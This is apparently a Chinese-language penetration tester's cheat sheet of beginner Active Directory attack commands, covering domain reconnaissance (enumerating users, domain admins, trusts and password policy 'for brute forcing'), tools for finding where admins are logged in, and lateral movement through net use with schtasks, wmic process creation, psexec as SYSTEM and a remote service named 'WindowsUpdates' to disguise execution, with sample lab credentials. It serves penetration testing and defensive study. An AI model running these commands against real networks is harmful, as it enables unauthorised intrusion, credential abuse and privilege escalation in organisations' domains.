域渗透初级命令

大概总结了一些以前项目中遇到域时用到的初级命令，他山之石，可以攻玉，大家见笑。

一、初始信息收集

1.查看当前网络及域名

ipconfig /all

2.查看安装的软件版本

wmic product get name,version

3.查看本机服务信息

wmic service list brief

4.查询进程列表

tasklist /svc wmic process list brief

wmic这个命令需要权限比较高才能看完全：

    

5.查询用户

本机是直接net user，如果在域环境里则是net user /domain（当前必须以域用户身份登陆凭据，否则会拒绝访问，如下图）

正常执行如下图：

6.列出与本地计算机连接的客户端信息

这个很有用，可以看到有谁通过smb协议连接上来。有时候拿到域里一台服务器，可以看到个人机的登陆地址。

net session

7.查询路由表和arp缓存表

route print 

可以看到当前可访问的网络范围，不过很多网络的子网掩码都是随便写的，但是超出掩码范围的还可以访问。

arp -a

可以看到曾经访问过的IP地址。

8.查询域里DNS服务器信息：

nslookup 域名

可以查看到本域DNS服务器的信息，一些比较小的域都是用DC当dns服务器的。    

9.定位域控

net time /domain

net group "domain controllers" /domain

nltest /dsgetdc:域名

nltest /dclist:域名

上图PDC为主域控

10.查看域里机器

net view /domain

（这个命令是查看所在域的名字，如果目标存在多个域，可以查看所有的域）

    

net view /domain:域名

（查看域里存在的机器，与本机有通讯的）

11.查看域里所有用户组

net group /domain

12.查看域里所有计算机

net group "domain computers" /domain   

13.查看域管账号

net group "domain admins" /domain

14.查看所有域用户账号

net user /domain

   

15.获取域密码策略

net accounts /domain

在爆破的时候可以作为参考

16.获取域信任信息

nltest /domain_trusts

在大型环境里面很有用，多个域之前存在信任关系的话横向比较顺利。

17.获取域内用户详细信息

wmic useraccount get /all

（需要与域控135端口通讯）    

18.查看企业管理员组成员

net group "Enterprise Admins" /domain

（有的环境这个组的成员权限也非常大）

二、定位域控

常见的域管理员定位工具有psloggedon.exe、PVEFindADUser.exe、netsess.exe，以及netview等。在 Powershell中，常用工具是PowerView。

1.psloggedon.exe

网上的文章都说psloggedon.exe是系统自带的，但其实这个在微软的PsTools里面，非自带。不得不吐槽一句，那些抄来抄去的文章真是害人不浅。

psloggedon.exe \IP 

psloggedon.exe username

第一次使用要加 -accepteula 参数，以后就不用了，因为它一开始会有一个同意使用的窗口。

微软签名，正常文件，不需要免杀。

此工具本质是检测注册表中HKEY_USERS的key值、调用了NetSessionEnum的API来判断谁登录过哪台 机器，如果无法读取或者读取注册表失败，此工具效果很差。

2.netsess.exe

这个是一个外国大牛2004年写的exe，现在还能用。

netsess.exe \\IP 

3.PVEFindADUser.exe

运行需要计算机支持framework2.0。网上说是需要管理员权限，可是我在本机测试普通成员权限是可以的。

pvefinaduser.exe -current

4.netview.exe

据说这个比较好，但是我在本地测试没有成功。

netview.exe -d 寻找当前域名下的session netview.exe -g 寻找指定用户组的登陆session 

5.PowerView.ps1

这个我在本地也没测试成功。。

三、执行命令

impacket包里面有很多执行命令的方式，网上也有很多文章，这里不再阐述，只介绍几种系统自带的正常可以远程执行命令的方法，winrm由于应用条件苛刻且基本很少存在，没有加入。

1.net use + at or schtasks

net use \\192.168.3.142\c$/u:0da\administrator "admin!@#45" 建立ipc连接 net time \\192.168.3.142 查看目标当前时间 at \\192.168.3.142 时间 要执行的命令 （08以后的系统已经弃用at，可以用下面的schtasks）

SCHTASKS /Create /S 192.168.3.142 /U 0day\Administrator /P "admin!@#45" /SC ONCE /ST 12:45 /TN test /TR c:\windows\system32\cmd.exe /RU system （一定要写后面的 /RU system）

2.wmic

wmic /node:192.168.3.142 /user:0day\administrator /password:admin!@#45 process call create "cmd.exe /c whoami > c:\x.txt" 

返回值为0代表执行成功。

另外：如果密码里面带有逗号，也就是 “,” 的话，会导致命令执行不成功。这时候可以把password参数删除交互输入密码，或者用类似impacket之类的工具。

3.psexec

psexec /accepteula //接受许可协议 psexec \\192.168.3.142 -u 0day\administrator -p admin!@#45 -s cmd.exe （ -s 是代表 用system权限启动，如果没有这个选项，默认配置下会显示 “登录失败: 未授予用户在此计算机上的请求登 录类型。”）

另外：一定要有本地管理员权限，否则会提示拒绝访问。如下图：

4.sc

net use \\192.168.3.8 /u:0day\administrator "admin!@#45" sc \\192.168.3.8 create "WindowsUpdates" binpath="cmd.exe /c start c:\x.bat" sc \\192.168.3.8 start WindowsUpdates sc \\192.168.3.8 delete WindowsUpdates       

显示失败，但是x.bat已经执行了：